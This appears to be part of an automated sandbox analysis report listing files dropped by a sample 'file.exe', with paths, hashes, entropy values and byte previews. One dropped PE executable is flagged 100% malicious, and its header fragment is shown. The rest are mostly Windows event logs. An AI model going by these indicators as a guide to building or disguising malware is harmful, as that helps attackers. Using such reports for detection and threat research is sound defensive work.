Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsHDGDGHCAAK.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3258368
Entropy (8bit):	6.661496661540679
Encrypted:	false
SSDEEP:	98304:5D1rocclYdPWK+d6SHVP1wdrbCpzFSHYZ0OCGOcywpXHk2FFbD:B1rocclYdPWK+d6SHVP1wdrbCpzFS/G1
MD5:	EC648136F42F41AEE2EFDC8361EA2508
SHA1:	79A5934E49F368FEE997E267B93863DA1FCD298C
SHA-256:	ABF71F5D21AB7EC91286E8DC11C2B52CA70A2B2271C6DC9D428F5BCE3FDB7A79
SHA-512:	7CDD659AE32CFE653809D42FD0EAE32BA33880F900E7A4C2937CA6AC35E63F21199D911775A7C7AEB1321683B84D1CD9696D785A2FE708078D1B1489F95D72C4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1......(2...@.................................W...k............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...sxcussbd..+.......*.................@...nssdjnnb......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.053677722524158
Encrypted:	false
SSDEEP:	768:ETwa2SbQZUE1lA6vOUZucxvbNp8CCM6cMbO9AjQwEPnPK0xv:cASbQZUE1lTkctNp8TcK0Ajs7
MD5:	EED8384518DA5E1E2AC85CA64C7275CE
SHA1:	A3C8485CC86B2479886B0CA877D93400074DBC33
SHA-256:	2ACAB75D01DD960E416DC5C7A380FF62522EF410C0D3D532A63AD13C749CD939
SHA-512:	F20BAF41E84370A78F9DE4963622B06901A4371FFF7E65AAD26ADE858B8171A0F80D91270101ABFB65F7AC26835F92A90FB8E328E13A4DE1360BAB1D1C1E072F
Malicious:	false
Preview:	ElfChnk.................q.......q...............0.....r....................................................................7l..................g...........................=...................................................................................p...................................t...?...........................................F...................M...5...........................@...................................................................................................................&...**..0...q.......{.X..3............&...........=..R..u..$.w.......A..k...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..2............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.A.P.I.2.F........)...G.u.i.d.....&.{.5.b.b.c.a.4.a.8.-.b.2.0.9.-.4.8.d.c.-.a.8.c.7.-.b.2.3.d.3.e.5.2.1.6.f.b.}.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1670351299751607
Encrypted:	false
SSDEEP:	384:dhe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842fWur:dVUHiapX7xadptrDT9W84YW8
MD5:	996B016BB3D8B8F99D1EDF6DCD7B675A
SHA1:	3920AF84BC43B8511F70AD9A8218E3553FCA6A7D
SHA-256:	35F7937E2EC325AE1714593B201A2F49E6B67464ECDD2D56A29BF442688B872D
SHA-512:	710C9AEEDF55FB0EF83DAEA0DF8C6FFE647B13B7323FD2B06AF14ADC741FAD1965F69E57631603F4D95F72980DD5C225A39B736ECA6577F3E445113853905A72
Malicious:	false
Preview:	ElfChnk.........1...............1...........p.......F./.......................................................................F................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.010692427789071
Encrypted:	false
SSDEEP:	384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
MD5:	26C4C5213F3C6B727417EF07207AC1E0
SHA1:	1815CC405C8B70939C252390E2A1AEC87EFF45F2
SHA-256:	767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
SHA-512:	0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
Malicious:	false
Preview:	ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.181014567944255
Encrypted:	false
SSDEEP:	384:ihfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVV:ihfwert
MD5:	A7E5EAEC71EFF3C3D158D3577EC4B10C
SHA1:	14B36536386A073FC99B5E3021206CD75C2B5314
SHA-256:	1C0F3209FD42CB2DCE38D921E95C88F537AAF4575AD789AEB527FD3B88A62F2F
SHA-512:	76507E96C3212608F94E21D2152FB8664F1AFFDD4DB277055C9B54340AB0A1E73E86CFE5E4487071381BD97E260FD968DAC6312B1B7D1374F8A273E7D674BC0F
Malicious:	false
Preview:	ElfChnk.....................................X... ...iPB.....................................................................&...................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4278479820973615
Encrypted:	false
SSDEEP:	384:khTm5mcWmNQ8EzmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvq:kqvECD6CL49mVpgwQFQ
MD5:	BB8AA1FB4DBD756EA4B3A7868A5F582C
SHA1:	92200C2E3EF1B138037E2B21E3886F6011D0DCC0
SHA-256:	8478EDF132CEDF7669A206B74B3CC24799DF8751A8F41C624A0447E3D0E40B5F
SHA-512:	27CD3B22DD92711412B5BEFBCD0D0FD4C7DE8363FA83B162F3EF14EC7899EE59D56B17493F7CCCECFE4E01B5C019FA8FC81EDD5E0893D7F15C15E64D2360BDDD
Malicious:	false
Preview:	ElfChnk..!.......!.......!.......!...................e[......................................................................s..................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.35229113141209156
Encrypted:	false
SSDEEP:	48:MkUWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyjdHLP7jMVckH58yk8:8NVaO8sMa3Z85ZMLurjj83Z85Zu
MD5:	32E13A60212AB6E0C1C26F4583034D5D
SHA1:	8A7358C913CD81FA51AEDA4218BCA9C9E50DD0A4
SHA-256:	F3C9708922BB3DAE54AB85ACABC803C669D5F1D92C7EA2A96E54461344C6B95A
SHA-512:	4D868B94046C3D5850B7ADF2B2B39D961B7AAAE7F57E7455460DF6F6D9FA63E74C363A080B22CAB15F35CF48DBC03243C6A7BB9878CDDF84329EC07D0154D778
Malicious:	false
Preview:	ElfChnk.....................................p.......B.......................................................................S.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.014860518194814
Encrypted:	false
SSDEEP:	1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
MD5:	4FB8E2CF8B3F20534836684947962DC2
SHA1:	B263607E627C81DA77DB65DF5AED2F3FD84B83E2
SHA-256:	DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
SHA-512:	D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
Malicious:	false
Preview:	ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.475155259294063
Encrypted:	false
SSDEEP:	384:Z9hzG3ohBGdGaML8GckgGmGLGoNGgGlGCmGRZGJGpGIGJQG9FGnYGN2G6GCGLigJ:XmYbaruBL84c7cYxGLUa0eQx5SRwM
MD5:	315D99826E4480BD88B3539FB64F0A77
SHA1:	0A0E83AFA811EDFE5DCC8A670640661069DA5DB9
SHA-256:	FC4028F8F06202794D66637455B134BA6FFAEC2FD2AD9B0D219B7D2AE09B36E6
SHA-512:	DE20C24729F7BA51C71352AC9712DD82A344BCAD7E29D6BE84865378C1FC54B8FBF51F08A6697CFDC03C7BD916C4AAE3242E68119C4DC41E1965B07BE672CBBC
Malicious:	false
Preview:	ElfChnk..................................... ...X.....{......................................................................!.?................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...................................5.......................E...E...................u...........................................e...................**..P...........>.................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.15655690871689
Encrypted:	false
SSDEEP:	768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
MD5:	2DE60575CB719BF51FAB8A63F696B052
SHA1:	BD44E6B92412898F185D5565865FEA3778573578
SHA-256:	7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
SHA-512:	0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
Malicious:	false
Preview:	ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0422166619363464
Encrypted:	false
SSDEEP:	384:Xhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorRor9orwTorYorDor+Yj:XDCYK6
MD5:	A167B634F5A2563975096CDD33F6D260
SHA1:	C8404A5DC311ABBAD9B10D371C2124A899AD3292
SHA-256:	D2B5321663ED259DE8C9009B667C69DED0CCDC9E1BB301AF140FADB7A52C231D
SHA-512:	1D62B49CECC0F633680CC9826FE301F05F17D8B4734F2F7E7E89EB2AA91FD5F36A47A2A54BC986F31B63C7547E9C7BCF50BF9ACE41E2607EDE740F79C7A2A3B5
Malicious:	false
Preview:	ElfChnk.........)...............)...........Hb...d..........................................................................ut.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8524226245257144
Encrypted:	false
SSDEEP:	384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
MD5:	B8E105CC52B7107E2757421373CBA144
SHA1:	39B61BEA2065C4FBEC143881220B37F3BA50A372
SHA-256:	B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
SHA-512:	7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
Malicious:	false
Preview:	ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8432997252442703
Encrypted:	false
SSDEEP:	384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
MD5:	39EE3557626C7F112A88A4DE12E904C1
SHA1:	C307FECC944D746A49EEA6451B7DA7301F03504C
SHA-256:	2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
SHA-512:	304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
Malicious:	false
Preview:	ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.955789519300273
Encrypted:	false
SSDEEP:	384:9hqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28Y:9bCyhLfIXBS5
MD5:	A07D9FF9BBBC6EDD95484EE3F0A6DF97
SHA1:	4F7A4370E95191A828C05D0370E5B78B6A9C43E5
SHA-256:	27959728EFB88E1D4C174DFAC8CC46911FF49D2921BFA4E01FD5113EC69A632A
SHA-512:	8721B5E0316D52A0F0B022F109C5635F8748345E4C453965642DEFFC6F215A5CD0E3DC7056DC3102B4BC7967C1D8529FBC546FDFD55E43C24A20B3573FAD9DDA
Malicious:	false
Preview:	ElfChnk.........G...............G...........P...@....a......................................................................Sg.h................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.904940375854865
Encrypted:	false
SSDEEP:	768:xcMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:KMhFBuVge
MD5:	5FEB5A8229488AA502BECCF58416793A
SHA1:	FB6F01F0CC84BB4F24BB40A6FDC5AB898F49AEAA
SHA-256:	C4526D7C4D4C78E991C263D62C0ABE323749777600C1C64E5E0617ABC0C04101
SHA-512:	69153BE4D929D98A0CD3DDAFED6F83B9AE02D801D2711366065D74BB378FC9FE81656EE7FCC086FC69E215C4A6DD0402F5D8F06E84A31F86BF999D75DEDD92A4
Malicious:	false
Preview:	ElfChnk.........A...............A...........................................................................................:D................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.634418630947688
Encrypted:	false
SSDEEP:	768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
MD5:	A00BAFFCABB00428EA0512FCECCC55E5
SHA1:	19F7C942DC26C3FF56D6240158734AFF67D6B93E
SHA-256:	92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
SHA-512:	DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
Malicious:	false
Preview:	ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0646587531847893
Encrypted:	false
SSDEEP:	384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
MD5:	399CAF70AC6E1E0C918905B719A0B3DD
SHA1:	62360CD0CA66E23C70E6DE3340698E7C0D789972
SHA-256:	FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
SHA-512:	A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
Malicious:	false
Preview:	ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4364303862010575
Encrypted:	false
SSDEEP:	384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
MD5:	2BB73ACC8F7419459C4BF931AB85352C
SHA1:	F1CE2EB960D3886F76094E2327DD092FC1208C7E
SHA-256:	1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
SHA-512:	7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
Malicious:	false
Preview:	ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m..............................%................ ..................&............0......................*......p..........T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.0631557320109892
Encrypted:	false
